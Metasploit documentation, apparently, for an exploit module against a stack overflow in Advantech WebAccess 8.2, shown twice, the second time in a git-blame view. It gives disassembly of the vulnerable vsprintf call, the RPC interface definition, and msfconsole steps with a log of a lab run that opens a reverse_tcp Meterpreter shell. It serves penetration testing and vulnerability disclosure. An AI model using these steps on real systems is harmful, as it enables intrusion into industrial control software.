documentation/modules/exploit/windows/scada/advantech_webaccess_webvrpcs_bof.md

## Vulnerable Application

  [Advantech WebAccess <= 8.2](http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170330.exe)

## Vulnerability Analysis

The stack overflow happens in sub_10004BC8:

```
.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)
.text:10004BC8 sub_10004BC8    proc near               ; 
.text:10004BC8                                         ;
.text:10004BC8
.text:10004BC8 lpWindowName    = dword ptr -818h
.text:10004BC8 hWnd            = dword ptr -814h
.text:10004BC8 lpClassName     = dword ptr -810h
.text:10004BC8 Args            = dword ptr -80Ch
.text:10004BC8 lpBaseAddress   = dword ptr -808h
.text:10004BC8 hFileMappingObject= dword ptr -804h
.text:10004BC8 Dest            = byte ptr -800h
.text:10004BC8 Format          = dword ptr  8
.text:10004BC8 arg_4           = byte ptr  0Ch
.text:10004BC8
.text:10004BC8                 push    ebp
.text:10004BC9                 mov     ebp, esp
.text:10004BCB                 sub     esp, 818h
.text:10004BD1                 mov     [ebp+lpWindowName], offset aDebugScreen1    ; "Debug Screen1"
.text:10004BDB                 mov     [ebp+lpClassName], offset aDebugwclass1     ; "debugWClass1"
.text:10004BE5                 lea     eax, [ebp+arg_4]
.text:10004BE8                 mov     [ebp+Args], eax
.text:10004BEE                 mov     ecx, [ebp+Args]
.text:10004BF4                 push    ecx                                         ; Args
.text:10004BF5                 mov     edx, [ebp+Format]
.text:10004BF8                 push    edx                                         ; Format
.text:10004BF9                 lea     eax, [ebp+Dest]
.text:10004BFF                 push    eax                                         ; Dest
.text:10004C00                 call    ds:vsprintf                                 ; overflow
```

The corresponding IDL is below:

```
[
 uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),
 version(1.0)
]

interface target_interface
{

/* opcode: 0x01, address: 0x00401260 */

void sub_401260 (
 [in] handle_t  arg_1,
 [in] long  arg_2,
 [in] long  arg_3,
 [in] long  arg_4,
 [in][ref][size_is(arg_4)] char * arg_5,
 [out][ref] long * arg_6
);

}
```

## Verification Steps

  1. Start `msfconsole`
  2. `use exploits/windows/scada/advantech_webaccess_webvrpcs_bof`
  3. `set payload windows/meterpreter/reverse_tcp`
  4. `set LHOST XXX.XXX.XXX.XXX`
  5. `exploit`
  6. **Verify** you get a connect back meterpreter


## Options

  None.

## Scenarios

  ```
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc 
[*] Processing scripts/advantech.rc for ERB directives.
resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof
resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/advantech.rc)> set RHOST 172.16.175.136
RHOST => 172.16.175.136
resource (scripts/advantech.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/advantech.rc)> exploit
[*] Started reverse TCP handler on 172.16.175.1:4444 
[*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[+] 172.16.175.136:4592 - Got a handle: 0x01ef2558
[*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31...
[*] Sending stage (179779 bytes) to 172.16.175.136
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600
[*] 172.16.175.136:4592 - The DCERPC service did not reply to our request

meterpreter > shell
Process 5208 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\WebAccess\Node>
```
added some docs 2017-12-07 16:58:14 -06:00			`## Vulnerable Application`

			`[Advantech WebAccess <= 8.2](http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170330.exe)`

			`## Vulnerability Analysis`

			`The stack overflow happens in sub_10004BC8:`

			```
			`.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)`
			`.text:10004BC8 sub_10004BC8 proc near ;`
			`.text:10004BC8 ;`
			`.text:10004BC8`
			`.text:10004BC8 lpWindowName = dword ptr -818h`
			`.text:10004BC8 hWnd = dword ptr -814h`
			`.text:10004BC8 lpClassName = dword ptr -810h`
			`.text:10004BC8 Args = dword ptr -80Ch`
			`.text:10004BC8 lpBaseAddress = dword ptr -808h`
			`.text:10004BC8 hFileMappingObject= dword ptr -804h`
			`.text:10004BC8 Dest = byte ptr -800h`
			`.text:10004BC8 Format = dword ptr 8`
			`.text:10004BC8 arg_4 = byte ptr 0Ch`
			`.text:10004BC8`
			`.text:10004BC8 push ebp`
			`.text:10004BC9 mov ebp, esp`
			`.text:10004BCB sub esp, 818h`
			`.text:10004BD1 mov [ebp+lpWindowName], offset aDebugScreen1 ; "Debug Screen1"`
			`.text:10004BDB mov [ebp+lpClassName], offset aDebugwclass1 ; "debugWClass1"`
			`.text:10004BE5 lea eax, [ebp+arg_4]`
			`.text:10004BE8 mov [ebp+Args], eax`
			`.text:10004BEE mov ecx, [ebp+Args]`
			`.text:10004BF4 push ecx ; Args`
			`.text:10004BF5 mov edx, [ebp+Format]`
			`.text:10004BF8 push edx ; Format`
			`.text:10004BF9 lea eax, [ebp+Dest]`
			`.text:10004BFF push eax ; Dest`
			`.text:10004C00 call ds:vsprintf ; overflow`
			```

			`The corresponding IDL is below:`

			```
			`[`
			`uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),`
			`version(1.0)`
			`]`

			`interface target_interface`
			`{`

			`/* opcode: 0x01, address: 0x00401260 */`

			`void sub_401260 (`
			`[in] handle_t arg_1,`
			`[in] long arg_2,`
			`[in] long arg_3,`
			`[in] long arg_4,`
			`[in][ref][size_is(arg_4)] char * arg_5,`
			`[out][ref] long * arg_6`
			`);`

			`}`
			```

			`## Verification Steps`

			1. Start `msfconsole`
			2. `use exploits/windows/scada/advantech_webaccess_webvrpcs_bof`
			3. `set payload windows/meterpreter/reverse_tcp`
			4. `set LHOST XXX.XXX.XXX.XXX`
			5. `exploit`
			`6. Verify you get a connect back meterpreter`


			`## Options`

			`None.`

			`## Scenarios`

			```
			`saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc`
			`[*] Processing scripts/advantech.rc for ERB directives.`
added some fixes 2017-12-11 11:34:17 -06:00			`resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof`
added some docs 2017-12-07 16:58:14 -06:00			`resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp`
			`payload => windows/meterpreter/reverse_tcp`
added some fixes 2017-12-11 11:34:17 -06:00			`resource (scripts/advantech.rc)> set RHOST 172.16.175.136`
			`RHOST => 172.16.175.136`
added some docs 2017-12-07 16:58:14 -06:00			`resource (scripts/advantech.rc)> set LHOST 172.16.175.1`
			`LHOST => 172.16.175.1`
			`resource (scripts/advantech.rc)> exploit`
			`[*] Started reverse TCP handler on 172.16.175.1:4444`
added some fixes 2017-12-11 11:34:17 -06:00			`[*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...`
			`[*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...`
			`[+] 172.16.175.136:4592 - Got a handle: 0x01ef2558`
			`[*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31...`
			`[*] Sending stage (179779 bytes) to 172.16.175.136`
			`[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600`
			`[*] 172.16.175.136:4592 - The DCERPC service did not reply to our request`
added some docs 2017-12-07 16:58:14 -06:00
			`meterpreter > shell`
			`Process 5208 created.`
			`Channel 1 created.`
			`Microsoft Windows [Version 6.1.7601]`
			`Copyright (c) 2009 Microsoft Corporation. All rights reserved.`

			`C:\WebAccess\Node>`
			```